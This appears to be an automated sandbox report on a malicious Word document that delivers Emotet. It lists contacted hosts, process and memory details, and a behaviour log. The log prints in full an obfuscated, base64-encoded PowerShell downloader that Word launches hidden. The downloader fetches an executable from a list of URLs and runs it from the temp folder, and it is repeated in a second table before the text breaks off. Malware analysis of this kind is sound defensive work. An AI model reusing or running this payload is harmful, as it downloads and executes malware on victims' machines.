Word Doc in Attached Email Downloads Emotet | Sequential Behavior
Try VMRay Analyzer
| Host | Resolved to | Country | City | Protocol |
|---|---|---|---|---|
| kerineal.com | 184.168.152.148 | US | Scottsdale | DNS, HTTP, TCP |
| 65.99.230.27 | US | Saint Louis | HTTP | |
| 185.82.23.28 | DE | HTTP |
| Information | Value |
|---|---|
| ID | #1 |
| File Name | c:\program files\microsoft office\root\office16\winword.exe |
| Command Line | "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" |
| Initial Working Directory | C:\Users\ATVeyDl98Z\Desktop\ |
| Monitor | Start Time: 00:00:14, Reason: Analysis Target |
| Unmonitor | End Time: 00:02:34, Reason: Terminated by Timeout |
| Monitor Duration | 00:02:20 |
| Information | Value |
|---|---|
| PID | 0x9f8 |
| Parent PID | 0x5f4 (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | ZJEWV7F\ATVeyDl98Z |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
A88
0x
A84
0x
A80
0x
A7C
0x
A78
0x
A74
0x
A70
0x
A50
0x
A48
0x
A44
0x
A40
0x
A3C
0x
A38
0x
A34
0x
A20
0x
A10
0x
A08
0x
A04
0x
9FC
0x
A8C
0x
A90
0x
AB4
0x
ACC
0x
BB8
0x
CB0
0x
CB4
0x
CB8
|
| Name | Start VA | End VA | Type | Permissions | Monitored | Dump | YARA Match | Actions |
|---|---|---|---|---|---|---|---|---|
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000020000 | 0x00020000 | 0x00020fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000040000 | 0x00040000 | 0x00043fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000050000 | 0x00050000 | 0x00050fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000000060000 | 0x00060000 | 0x00060fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000070000 | 0x00070000 | 0x0016ffff | Private Memory | Readable, Writable |
|
|
|
|
| locale.nls | 0x00170000 | 0x001d6fff | Memory Mapped File | Readable |
|
|
|
|
| private_0x00000000001e0000 | 0x001e0000 | 0x001e0fff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x00000000001f0000 | 0x001f0000 | 0x001f0fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000200000 | 0x00200000 | 0x00206fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000000210000 | 0x00210000 | 0x0030ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000310000 | 0x00310000 | 0x00311fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000320000 | 0x00320000 | 0x00320fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000330000 | 0x00330000 | 0x00330fff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000340000 | 0x00340000 | 0x00341fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000350000 | 0x00350000 | 0x00351fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000360000 | 0x00360000 | 0x00362fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000000370000 | 0x00370000 | 0x0037ffff | Private Memory |
|
|
|
|
|
| pagefile_0x0000000000380000 | 0x00380000 | 0x00382fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000000390000 | 0x00390000 | 0x0039ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x00000000003a0000 | 0x003a0000 | 0x00467fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000470000 | 0x00470000 | 0x00570fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000580000 | 0x00580000 | 0x0117ffff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000001180000 | 0x01180000 | 0x01182fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000001190000 | 0x01190000 | 0x01192fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x00000000011a0000 | 0x011a0000 | 0x011a1fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x00000000011b0000 | 0x011b0000 | 0x011cffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x00000000011d0000 | 0x011d0000 | 0x011d1fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x00000000011e0000 | 0x011e0000 | 0x011e1fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x00000000011f0000 | 0x011f0000 | 0x01213fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000001220000 | 0x01220000 | 0x01220fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000001230000 | 0x01230000 | 0x01238fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000001240000 | 0x01240000 | 0x01248fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000001260000 | 0x01260000 | 0x01260fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000001270000 | 0x01270000 | 0x0127ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000001280000 | 0x01280000 | 0x01283fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000001290000 | 0x01290000 | 0x01290fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x00000000012a0000 | 0x012a0000 | 0x012a0fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x00000000012b0000 | 0x012b0000 | 0x012b0fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000012c0000 | 0x012c0000 | 0x012c0fff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x00000000012d0000 | 0x012d0000 | 0x012d1fff | Pagefile Backed Memory | Readable |
|
|
|
|
| winword.exe | 0x012e0000 | 0x014b8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sortdefault.nls | 0x014c0000 | 0x0178efff | Memory Mapped File | Readable |
|
|
|
|
| pagefile_0x0000000001790000 | 0x01790000 | 0x01b82fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000001b90000 | 0x01b90000 | 0x01c8ffff | Private Memory | Readable, Writable |
|
|
|
|
| kernelbase.dll.mui | 0x01c90000 | 0x01d4ffff | Memory Mapped File | Readable, Writable |
|
|
|
|
| msxml6r.dll | 0x01d50000 | 0x01d50fff | Memory Mapped File | Readable |
|
|
|
|
| private_0x0000000001d60000 | 0x01d60000 | 0x01d9ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000001da0000 | 0x01da0000 | 0x01e7efff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000001e80000 | 0x01e80000 | 0x01f7ffff | Private Memory | Readable, Writable |
|
|
|
|
| {afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000015.db | 0x01f80000 | 0x01f9ffff | Memory Mapped File | Readable |
|
|
|
|
| private_0x0000000001fa0000 | 0x01fa0000 | 0x0209ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000020a0000 | 0x020a0000 | 0x020c3fff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000002110000 | 0x02110000 | 0x02110fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000002120000 | 0x02120000 | 0x02121fff | Pagefile Backed Memory | Readable |
|
|
|
|
| c_1255.nls | 0x02130000 | 0x02140fff | Memory Mapped File | Readable |
|
|
|
|
| private_0x0000000002150000 | 0x02150000 | 0x0215ffff | Private Memory | Readable, Writable |
|
|
|
|
| onbttnwd.dll | 0x02160000 | 0x02165fff | Memory Mapped File | Readable |
|
|
|
|
| private_0x0000000002170000 | 0x02170000 | 0x0226ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002270000 | 0x02270000 | 0x0228ffff | Private Memory |
|
|
|
|
|
| private_0x0000000002290000 | 0x02290000 | 0x022aefff | Private Memory | Readable, Writable |
|
|
|
|
| segoeuib.ttf | 0x022b0000 | 0x02329fff | Memory Mapped File | Readable |
|
|
|
|
| private_0x00000000023b0000 | 0x023b0000 | 0x023cffff | Private Memory |
|
|
|
|
|
| private_0x00000000023d0000 | 0x023d0000 | 0x024cffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000024d0000 | 0x024d0000 | 0x025cffff | Private Memory | Readable, Writable |
|
|
|
|
| stdole2.tlb | 0x025d0000 | 0x025d3fff | Memory Mapped File | Readable |
|
|
|
|
| private_0x0000000002600000 | 0x02600000 | 0x0263ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002640000 | 0x02640000 | 0x0267ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002680000 | 0x02680000 | 0x026fffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002770000 | 0x02770000 | 0x0277ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002780000 | 0x02780000 | 0x0287ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000028b0000 | 0x028b0000 | 0x029affff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x00000000029b0000 | 0x029b0000 | 0x02daffff | Pagefile Backed Memory | Readable |
|
|
|
|
| staticcache.dat | 0x02db0000 | 0x036dffff | Memory Mapped File | Readable |
|
|
|
|
| segoeui.ttf | 0x036e0000 | 0x0375efff | Memory Mapped File | Readable |
|
|
|
|
| private_0x0000000003760000 | 0x03760000 | 0x0385ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000003880000 | 0x03880000 | 0x0397ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000039b0000 | 0x039b0000 | 0x039bffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000039c0000 | 0x039c0000 | 0x03abffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000003ad0000 | 0x03ad0000 | 0x03b0ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000003b30000 | 0x03b30000 | 0x03b3ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000003b40000 | 0x03b40000 | 0x03b7ffff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x0000000003b80000 | 0x03b80000 | 0x0437ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x0000000004380000 | 0x04380000 | 0x0447ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000004480000 | 0x04480000 | 0x0467ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000046e0000 | 0x046e0000 | 0x047dffff | Private Memory | Readable, Writable |
|
|
|
|
| seguisb.ttf | 0x047e0000 | 0x04843fff | Memory Mapped File | Readable |
|
|
|
|
| private_0x00000000048a0000 | 0x048a0000 | 0x0499ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000004a20000 | 0x04a20000 | 0x04b1ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000004b20000 | 0x04b20000 | 0x04f1ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x0000000004f30000 | 0x04f30000 | 0x0502ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000005080000 | 0x05080000 | 0x050bffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000050c0000 | 0x050c0000 | 0x054bffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000054c0000 | 0x054c0000 | 0x058bffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x00000000058c0000 | 0x058c0000 | 0x060bffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x00000000060c0000 | 0x060c0000 | 0x064c0fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000064d0000 | 0x064d0000 | 0x068d0fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000068e0000 | 0x068e0000 | 0x06ce0fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000006cf0000 | 0x06cf0000 | 0x06eeffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000006ef0000 | 0x06ef0000 | 0x073affff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000073b0000 | 0x073b0000 | 0x07baffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000007bb0000 | 0x07bb0000 | 0x07faffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000007fb0000 | 0x07fb0000 | 0x080affff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000008110000 | 0x08110000 | 0x0820ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000008210000 | 0x08210000 | 0x0830ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000083d0000 | 0x083d0000 | 0x084cffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000084f0000 | 0x084f0000 | 0x085effff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000008610000 | 0x08610000 | 0x0870ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000008790000 | 0x08790000 | 0x0888ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000035c20000 | 0x35c20000 | 0x35c2ffff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| msohev.dll | 0x5f9d0000 | 0x5f9e6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| onbttnwd.dll | 0x5fae0000 | 0x5fb0bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| chart.dll | 0x5fb10000 | 0x60304fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| riched20.dll | 0x60310000 | 0x604b1fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| mscoreei.dll | 0x60590000 | 0x60607fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| mscoree.dll | 0x60610000 | 0x60659fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| dwrite.dll | 0x60660000 | 0x60769fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| d3d10warp.dll | 0x60770000 | 0x6089bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msptls.dll | 0x608a0000 | 0x609b7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msointl.dll | 0x609c0000 | 0x60b34fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wwintl.dll | 0x60b40000 | 0x60be8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msores.dll | 0x60bf0000 | 0x65a2efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| mso99lres.dll | 0x65a30000 | 0x66350fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| mso40uires.dll | 0x66360000 | 0x66667fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| mso.dll | 0x66670000 | 0x67421fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| mso99lwin32client.dll | 0x67430000 | 0x679c7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| mso40uiwin32client.dll | 0x679d0000 | 0x680e4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| mso30win32client.dll | 0x680f0000 | 0x683f1fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| mso20win32client.dll | 0x68400000 | 0x685d4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| oart.dll | 0x685e0000 | 0x691d1fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| d3d11.dll | 0x691e0000 | 0x69262fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wwlib.dll | 0x69270000 | 0x6aed1fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ucrtbase.dll | 0x6aee0000 | 0x6afbbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| appvisvsubsystems32.dll | 0x6afc0000 | 0x6b174fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| osppc.dll | 0x6b280000 | 0x6b2acfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sppc.dll | 0x6b2b0000 | 0x6b2d0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| mlang.dll | 0x6b690000 | 0x6b6bdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| npmproxy.dll | 0x6c840000 | 0x6c847fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msxml6.dll | 0x6cf80000 | 0x6d0d7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| winspool.drv | 0x6d400000 | 0x6d450fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| office.odf | 0x6ef70000 | 0x6f128fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| api-ms-win-crt-utility-l1-1-0.dll | 0x6f130000 | 0x6f132fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| api-ms-win-crt-environment-l1-1-0.dll | 0x6f140000 | 0x6f142fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| api-ms-win-crt-filesystem-l1-1-0.dll | 0x6f150000 | 0x6f152fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| api-ms-win-crt-time-l1-1-0.dll | 0x6f160000 | 0x6f162fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| api-ms-win-crt-multibyte-l1-1-0.dll | 0x6f1a0000 | 0x6f1a4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| api-ms-win-crt-math-l1-1-0.dll | 0x6f1b0000 | 0x6f1b4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| api-ms-win-crt-locale-l1-1-0.dll | 0x6f1c0000 | 0x6f1c2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msvcp140.dll | 0x6f1d0000 | 0x6f23cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
|
For performance reasons, the remaining 294 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Keyboard | Read | virtual_key_code = VK_CANCEL, result_out = 0 |
|
1 | |
| Module | Load | module_name = VBE7.DLL, base_address = 0x72570000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = 600, address_out = 0x725c8346 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CANCEL, result_out = 0 |
|
5 | |
| Process | Create | process_name = powershell -e JAB7AHcAYABzAGAAYwBSAEkAcAB0AH0AIAA9ACAAJgAoACIAewAyAH0AewAxAH0AewAwAH0AIgAtAGYAIAAnAG8AYgBqAGUAYwB0ACcALAAnAGUAdwAtACcALAAnAG4AJwApACAALQBDAG8AbQBPAGIAagBlAGMAdAAgACgAIgB7ADQAfQB7ADIAfQB7ADEAfQB7ADMAfQB7ADAAfQAiACAALQBmACAAJwBsAGwAJwAsACcAUwAnACwAJwAuACcALAAnAGgAZQAnACwAJwBXAFMAYwByAGkAcAB0ACcAKQA7ACQAewBXAGUAQgBjAGwAYABpAGAARQBOAHQAfQAgAD0AIAAuACgAIgB7ADAAfQB7ADEAfQB7ADIAfQB7ADMAfQAiACAALQBmACAAJwBuAGUAdwAtACcALAAnAG8AJwAsACcAYgAnACwAJwBqAGUAYwB0ACcAKQAgACgAIgB7ADQAfQB7ADEAfQB7ADMAfQB7ADAAfQB7ADIAfQAiACAALQBmACAAJwBsAGkAZQAnACwAJwB0AGUAbQAuAE4AZQB0ACcALAAnAG4AdAAnACwAJwAuAFcAZQBiAEMAJwAsACcAUwB5AHMAJwApADsAJAB7AHIAYQBgAE4ARABPAE0AfQAgAD0AIAAmACgAIgB7ADMAfQB7ADIAfQB7ADEAfQB7ADAAfQAiACAALQBmACcAYwB0ACcALAAnAGIAagBlACcALAAnAGUAdwAtAG8AJwAsACcAbgAnACkAIAAoACIAewAwAH0AewAxAH0AIgAtAGYAIAAnAHIAYQBuAGQAbwAnACwAJwBtACcAKQA7ACQAewB1AGAAUgBsAFMAfQAgAD0AIAAoACIAewAxADcAfQB7ADIAMQB9AHsAMQAxAH0AewAxADUAfQB7ADEAfQB7ADMAfQB7ADMAOAB9AHsAMwA5AH0AewAzADcAfQB7ADIAMgB9AHsAMQAwAH0AewA2AH0AewAzADEAfQB7ADAAfQB7ADMANAB9AHsAMQA2AH0AewAyADYAfQB7ADMAMAB9AHsAMgAwAH0AewAxADQAfQB7ADkAfQB7ADMANgB9AHsAMgAzAH0AewA4AH0AewAyADQAfQB7ADIANQB9AHsAMgA5AH0AewAyADgAfQB7ADEAMgB9AHsANQB9AHsAMgB9AHsAMQA5AH0AewAyADcAfQB7ADcAfQB7ADEAMwB9AHsANAB9AHsAMQA4AH0AewAzADMAfQB7ADMANQB9AHsAMwAyAH0AIgAgAC0AZgAgACcAZQBhAHQAcwBwAGEAJwAsACcAaQBuAGUAJwAsACcAcwAuAGMAJwAsACcAYQBsAC4AYwBvAG0AJwAsACcAZwAnACwAJwBsAHUAJwAsACcAaAAnACwAJwByAGUAcwBzAC8AJwAsACcAZQBzAC4AbgBlACcALAAnAC8ALABoAHQAdABwACcALAAnACwAJwAsACcALwBrAGUAJwAsACcALwBiAG0AYQBzAHQAZQByAHAAJwAsACcARAAnACwAJwB5AHIAcgAnACwAJwByACcALAAnAC4AdQBrAC8AVgBRAC8ALABoAHQAdABwADoALwAvAHUAbQBlACcALAAnAGgAdAB0ACcALAAnAE4AJwAsACcAbwBtAC8AJwAsACcAbwBtAC8AJwAsACcAcAA6AC8AJwAsACcALwBoAFEAbwBCAG0ALwAnACwAJwAvAC8AbgB5AGUAcgBnACcALAAnAHQALwAnACwAJwBxAHEAcgAvACwAJwAsACcAeAAnACwAJwB3AG8AcgBkAHAAJwAsACcAcAA6AC8AJwAsACcAaAB0AHQAJwAsACcAeAAuAGMAJwAsACcAdAB0AHAAOgAvAC8AJwAsACcASgBGAGgALwAnACwAJwBuAGsAJwAsACcAbQAuAGMAbwAnACwAJwBHACcALAAnADoAJwAsACcAdAAnACwAJwAvAHMAJwAsACcAaQBtAHAAbAB5AGUAbABlAGcAYQBuACcAKQAuACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACcAbABpAHQAJwAsACcAUwBwACcAKQAuAEkAbgB2AG8AawBlACgAJwAsACcAKQA7ACQAewBuAGAAQQBtAEUAfQAgAD0AIAAkAHsAcgBhAG4ARABgAE8ATQB9AC4AKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAIAAnAHQAJwAsACcAbgBlAHgAJwApAC4ASQBuAHYAbwBrAGUAKAAxACwAIAA2ADUANQAzADYAKQA7ACQAewBQAGAAQQBUAEgAfQAgAD0AIAAkAHsARQBgAE4AdgA6AGAAVABFAE0AUAB9ACAAKwAgACcAXAAnACAAKwAgACQAewBOAGAAQQBtAEUAfQAgACsAIAAoACIAewAxAH0AewAwAH0AIgAtAGYAJwBlAHgAZQAnACwAJwAuACcAKQA7AGYAbwByAGUAYQBjAGgAKAAkAHsAdQBgAFIAbAB9ACAAaQBuACAAJAB7AFUAUgBgAGwAUwB9ACkAewB0AHIAeQB7ACQAewB3AEUAYgBgAGMATABJAGUAYABOAHQAfQAuACgAIgB7ADEAfQB7ADAAfQB7ADIAfQAiAC0AZgAnAG4AbAAnACwAJwBEAG8AdwAnACwAJwBvAGEAZABGAGkAbABlACcAKQAuAEkAbgB2AG8AawBlACgAJAB7AHUAYABSAEwAfQAuACgAIgB7ADIAfQB7ADEAfQB7ADAAfQAiAC0AZgAgACcAbgBnACcALAAnAGkAJwAsACcAVABvAFMAdAByACcAKQAuAEkAbgB2AG8AawBlACgAKQAsACAAJAB7AFAAYABBAHQAaAB9ACkAOwAmACgAIgB7ADAAfQB7ADEAfQB7ADIAfQAiACAALQBmACAAJwBTACcALAAnAHQAYQByAHQALQAnACwAJwBQAHIAbwBjAGUAcwBzACcAKQAgACQAewBQAEEAYABUAEgAfQA7AGIAcgBlAGEAawA7AH0AYwBhAHQAYwBoAHsALgAoACIAewAyAH0AewAxAH0AewAwAH0AIgAtAGYAJwBpAHQAZQAtAGgAbwBzAHQAJwAsACcAcgAnACwAJwB3ACcAKQAgACQAewBfAH0ALgAiAEUAeABDAGAAZQBgAFAAVABpAE8ATgAiAC4AIgBtAGUAcwBzAGAAQQBgAGcAZQAiADsAfQB9AA0ACgA=, os_pid = 0xad4, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 |
| Information | Value |
|---|---|
| ID | #2 |
| File Name | c:\windows\system32\windowspowershell\v1.0\powershell.exe |
| Command Line | powershell -e JAB7AHcAYABzAGAAYwBSAEkAcAB0AH0AIAA9ACAAJgAoACIAewAyAH0AewAxAH0AewAwAH0AIgAtAGYAIAAnAG8AYgBqAGUAYwB0ACcALAAnAGUAdwAtACcALAAnAG4AJwApACAALQBDAG8AbQBPAGIAagBlAGMAdAAgACgAIgB7ADQAfQB7ADIAfQB7ADEAfQB7ADMAfQB7ADAAfQAiACAALQBmACAAJwBsAGwAJwAsACcAUwAnACwAJwAuACcALAAnAGgAZQAnACwAJwBXAFMAYwByAGkAcAB0ACcAKQA7ACQAewBXAGUAQgBjAGwAYABpAGAARQBOAHQAfQAgAD0AIAAuACgAIgB7ADAAfQB7ADEAfQB7ADIAfQB7ADMAfQAiACAALQBmACAAJwBuAGUAdwAtACcALAAnAG8AJwAsACcAYgAnACwAJwBqAGUAYwB0ACcAKQAgACgAIgB7ADQAfQB7ADEAfQB7ADMAfQB7ADAAfQB7ADIAfQAiACAALQBmACAAJwBsAGkAZQAnACwAJwB0AGUAbQAuAE4AZQB0ACcALAAnAG4AdAAnACwAJwAuAFcAZQBiAEMAJwAsACcAUwB5AHMAJwApADsAJAB7AHIAYQBgAE4ARABPAE0AfQAgAD0AIAAmACgAIgB7ADMAfQB7ADIAfQB7ADEAfQB7ADAAfQAiACAALQBmACcAYwB0ACcALAAnAGIAagBlACcALAAnAGUAdwAtAG8AJwAsACcAbgAnACkAIAAoACIAewAwAH0AewAxAH0AIgAtAGYAIAAnAHIAYQBuAGQAbwAnACwAJwBtACcAKQA7ACQAewB1AGAAUgBsAFMAfQAgAD0AIAAoACIAewAxADcAfQB7ADIAMQB9AHsAMQAxAH0AewAxADUAfQB7ADEAfQB7ADMAfQB7ADMAOAB9AHsAMwA5AH0AewAzADcAfQB7ADIAMgB9AHsAMQAwAH0AewA2AH0AewAzADEAfQB7ADAAfQB7ADMANAB9AHsAMQA2AH0AewAyADYAfQB7ADMAMAB9AHsAMgAwAH0AewAxADQAfQB7ADkAfQB7ADMANgB9AHsAMgAzAH0AewA4AH0AewAyADQAfQB7ADIANQB9AHsAMgA5AH0AewAyADgAfQB7ADEAMgB9AHsANQB9AHsAMgB9AHsAMQA5AH0AewAyADcAfQB7ADcAfQB7ADEAMwB9AHsANAB9AHsAMQA4AH0AewAzADMAfQB7ADMANQB9AHsAMwAyAH0AIgAgAC0AZgAgACcAZQBhAHQAcwBwAGEAJwAsACcAaQBuAGUAJwAsACcAcwAuAGMAJwAsACcAYQBsAC4AYwBvAG0AJwAsACcAZwAnACwAJwBsAHUAJwAsACcAaAAnACwAJwByAGUAcwBzAC8AJwAsACcAZQBzAC4AbgBlACcALAAnAC8ALABoAHQAdABwACcALAAnACwAJwAsACcALwBrAGUAJwAsACcALwBiAG0AYQBzAHQAZQByAHAAJwAsACcARAAnACwAJwB5AHIAcgAnACwAJwByACcALAAnAC4AdQBrAC8AVgBRAC8ALABoAHQAdABwADoALwAvAHUAbQBlACcALAAnAGgAdAB0ACcALAAnAE4AJwAsACcAbwBtAC8AJwAsACcAbwBtAC8AJwAsACcAcAA6AC8AJwAsACcALwBoAFEAbwBCAG0ALwAnACwAJwAvAC8AbgB5AGUAcgBnACcALAAnAHQALwAnACwAJwBxAHEAcgAvACwAJwAsACcAeAAnACwAJwB3AG8AcgBkAHAAJwAsACcAcAA6AC8AJwAsACcAaAB0AHQAJwAsACcAeAAuAGMAJwAsACcAdAB0AHAAOgAvAC8AJwAsACcASgBGAGgALwAnACwAJwBuAGsAJwAsACcAbQAuAGMAbwAnACwAJwBHACcALAAnADoAJwAsACcAdAAnACwAJwAvAHMAJwAsACcAaQBtAHAAbAB5AGUAbABlAGcAYQBuACcAKQAuACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACcAbABpAHQAJwAsACcAUwBwACcAKQAuAEkAbgB2AG8AawBlACgAJwAsACcAKQA7ACQAewBuAGAAQQBtAEUAfQAgAD0AIAAkAHsAcgBhAG4ARABgAE8ATQB9AC4AKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAIAAnAHQAJwAsACcAbgBlAHgAJwApAC4ASQBuAHYAbwBrAGUAKAAxACwAIAA2ADUANQAzADYAKQA7ACQAewBQAGAAQQBUAEgAfQAgAD0AIAAkAHsARQBgAE4AdgA6AGAAVABFAE0AUAB9ACAAKwAgACcAXAAnACAAKwAgACQAewBOAGAAQQBtAEUAfQAgACsAIAAoACIAewAxAH0AewAwAH0AIgAtAGYAJwBlAHgAZQAnACwAJwAuACcAKQA7AGYAbwByAGUAYQBjAGgAKAAkAHsAdQBgAFIAbAB9ACAAaQBuACAAJAB7AFUAUgBgAGwAUwB9ACkAewB0AHIAeQB7ACQAewB3AEUAYgBgAGMATABJAGUAYAB